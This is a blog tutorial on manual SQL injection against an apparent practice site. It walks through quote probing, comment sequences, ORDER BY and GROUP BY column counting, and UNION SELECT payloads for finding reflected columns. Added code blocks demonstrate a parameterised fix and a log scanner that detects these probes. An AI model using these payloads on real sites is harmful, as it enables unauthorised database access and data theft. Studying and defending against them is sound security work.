Sunday, May 3, 2015

How to Find Number of Columns In a Vulnerable site Using Order By | Group By Part 2


Today we will learn how to find the number of columns a site's query returns, and also which of those columns is vulnerable (reflected in the page).

Let's start:

This is the site which is vulnerable (a practice target):

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
First we add a single quote ' to check whether it is vulnerable or not:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' 

If it generates an error message like "You have an error in your SQL syntax", it means the input reaches the query unescaped and the page is vulnerable to SQL injection.
So in my case it generates the error message, as you can see in the picture:
------------------------------------------------------------------------------------------------------------------------
~~~ Fixing and Balancing a Query ~~~
------------------------------------------------------------------------------------------------------------------------

Fixing (balancing) the query plays a very important role in SQL injection: until the syntax error is cleared we can neither find the number of columns nor extract database information.
We can fix a query by using a comment sequence, like this:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' --+

If adding --+ makes the error go away, our query is fixed. Now we can use ORDER BY or GROUP BY to find the number of columns and perform other tasks.

A cheat sheet of comment sequences for fixing a query:


--   : MySQL, Linux style
--+  : MySQL, Windows style (the + is URL-decoded to a space)
#    : Hash (URL-encode it while using it)
--+- : SQL comment
;    : Null byte
`    : Backtick
Remember: when the input is enclosed in single quotes, only a single quote in the input will cause an error. When the input is enclosed in double quotes, a double quote in the input will cause the error. When the input is not enclosed in anything, both a single quote and a double quote will cause an error.
--------------------------------------------------------------------------------------------------------------------------
So in my case it is fixed by using --+:


http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' --+
As you can see in this picture, the error is gone. Now we can use ORDER BY or GROUP BY to find the number of columns.

[Screenshot: fixing a query]



In some cases it is not fixed by --+; then we try the null byte ;, the backtick, or #.
In some cases we have to remove the single quote ' and put only -- at the end:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 --
----------------------------------------------------------------------------------------------------------------------
Finding the Number of Columns
----------------------------------------------------------------------------------------------------------------------
After fixing the query, we now find the number of columns.
First I am going to ask the database whether it has 1 column, like this:


http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+
[Screenshot: basics of SQL, ORDER BY 1]


If it does not generate an error message, it means the query has at least one column.

Now I am going to ask again whether it has 2 columns:


http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 2--+

It does not generate an error.
 

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3--+

No error:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 4--+

This time it gives me an error like this:

Error While Selection process : Unknown column '4' in 'order clause'
[Screenshot: SQL basics, ORDER BY 4 error]
So it means the query has 3 columns, because at ORDER BY 4 the database tells us that column 4 is unknown.
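As an added example (not from the original post), here is the quoting context the tutorial relies on rebuilt against an in-memory SQLite table, with the hardened parameterised lookup beside it. The table, its three columns and the probe strings are constructed for this illustration; SQLite's "out of range" message plays the role of MySQL's "Unknown column" error.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the tutorial's target: a 3-column table looked up by id."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT, note TEXT)")
    conn.execute("INSERT INTO items VALUES (1, 'first', 'sample row')")
    return conn

def vulnerable_lookup(conn, raw_id):
    """The quoting context the post describes: input pasted inside single quotes,
    and the database error echoed back, which is what makes column counting work."""
    sql = f"SELECT id, name, note FROM items WHERE id = '{raw_id}'"
    try:
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "error", str(exc)

def safe_lookup(conn, raw_id):
    """Hardened form: a bound parameter is data, never SQL, so ORDER BY or comment
    text in the input cannot change the query; the error text is not echoed either."""
    try:
        rows = conn.execute("SELECT id, name, note FROM items WHERE id = ?", (raw_id,)).fetchall()
        return "ok", rows
    except sqlite3.Error:
        return "error", "lookup failed"   # generic message, no schema detail

if __name__ == "__main__":
    db = make_db()
    # Decoded forms of the post's URLs: '--+' reaches the database as '-- '.
    for probe in ["1", "1'", "1' order by 3-- ", "1' order by 4-- ", "1' group by 1,2,3,4-- "]:
        print(repr(probe), "->", vulnerable_lookup(db, probe), "|", safe_lookup(db, probe))
```

Only the concatenated query answers the column-count question; the parameterised one returns an empty result for every probe and never leaks a database error.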
----------------------------------------------------------------------------------------------------------------------
~~ Performing the Same Process with GROUP BY ~~
----------------------------------------------------------------------------------------------------------------------
My favourite is GROUP BY.

With GROUP BY we can test multiple column numbers at once, like this:



http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' group by 1--+
No error:
  

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' group by 1,2,3--+

No error:


http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' group by 1,2,3,4,5,6,7,8,9--+

But this time it generates an error:
Error While Selection process : Unknown column '4' in 'group statement'

[Screenshot: GROUP BY error]


It also tells us that the query has 3 columns, since the first unknown column is 4.
----------------------------------------------------------------------------------------------------------------------

How to Find Vulnerable Columns
----------------------------------------------------------------------------------------------------------------------

Rules:
- by using UNION SELECT
- by nullifying the parameter


-------------------------------------------
As we know the query has 3 columns, so now we find which column is vulnerable:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,2,3--+

[Screenshot: UNION SELECT result]
As you can see in this picture, after nullifying the parameter (id=-1, so the original row is not returned and the UNION row is displayed) the page shows 2. It means that of columns 1, 2 and 3, column 2 is the vulnerable column, where we can put our injection and extract some juicy data.
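From the defender's side, an added example that is not part of the original post: a small scanner that decodes the request paths in web-server log lines, labels ORDER BY, GROUP BY and UNION SELECT probes, and flags a client that walks ORDER BY 1, 2, 3, 4 in sequence, the column-counting pattern shown above. The log lines, client IPs and timestamps are constructed; the paths mirror the tutorial's URLs.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (IPs and times made up) mirroring the tutorial's probe URLs.
SAMPLE_LOG = """\
203.0.113.7 - - [03/May/2015:10:00:01 +0000] "GET /tasks/basic_ch1.php?id=1 HTTP/1.1" 200 512
203.0.113.7 - - [03/May/2015:10:00:09 +0000] "GET /tasks/basic_ch1.php?id=1%27+order+by+1--+ HTTP/1.1" 200 512
203.0.113.7 - - [03/May/2015:10:00:12 +0000] "GET /tasks/basic_ch1.php?id=1%27+order+by+2--+ HTTP/1.1" 200 512
203.0.113.7 - - [03/May/2015:10:00:15 +0000] "GET /tasks/basic_ch1.php?id=1%27+order+by+3--+ HTTP/1.1" 200 512
203.0.113.7 - - [03/May/2015:10:00:18 +0000] "GET /tasks/basic_ch1.php?id=1%27+order+by+4--+ HTTP/1.1" 200 470
203.0.113.7 - - [03/May/2015:10:00:25 +0000] "GET /tasks/basic_ch1.php?id=1%27+group+by+1,2,3,4,5--+ HTTP/1.1" 200 470
203.0.113.7 - - [03/May/2015:10:00:40 +0000] "GET /tasks/basic_ch1.php?id=-1%27+union+select+1,2,3--+ HTTP/1.1" 200 512
198.51.100.4 - - [03/May/2015:10:01:00 +0000] "GET /tasks/basic_ch1.php?id=2 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) ')   # client IP, request path
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)")
GROUP_BY = re.compile(r"\bgroup\s+by\s+\d+(?:\s*,\s*\d+)*")
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b")

def classify(path):
    """Label one request path as a probe type (plus the ORDER BY term), or (None, None)."""
    decoded = unquote_plus(path.partition("?")[2]).lower()   # '--+' decodes to '-- '
    if UNION.search(decoded):
        return "union-select", None
    m = ORDER_BY.search(decoded)
    if m:
        return "order-by", int(m.group(1))
    if GROUP_BY.search(decoded):
        return "group-by", None
    return None, None

def scan(log_text):
    """Per-client probe labels, plus 'sweep' when ORDER BY terms rise 1, 2, 3, ... in order."""
    hits = defaultdict(lambda: {"probes": [], "terms": []})
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        ip, path = m.groups()
        label, term = classify(path)
        if label is None:
            continue
        hits[ip]["probes"].append(label)
        if term is not None:
            hits[ip]["terms"].append(term)
    for info in hits.values():
        t = info["terms"]
        info["sweep"] = len(t) >= 3 and all(b == a + 1 for a, b in zip(t, t[1:]))
    return dict(hits)
```

Decoding before matching is what makes the rule hold: the tutorial's --+ only becomes a comment once the + is turned back into a space.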
--------------------------------------------------------------------------------------------------------------------

In the next tutorial we will learn how to print the name, database, version, user, port, tables and columns.

Author: (AFghani)
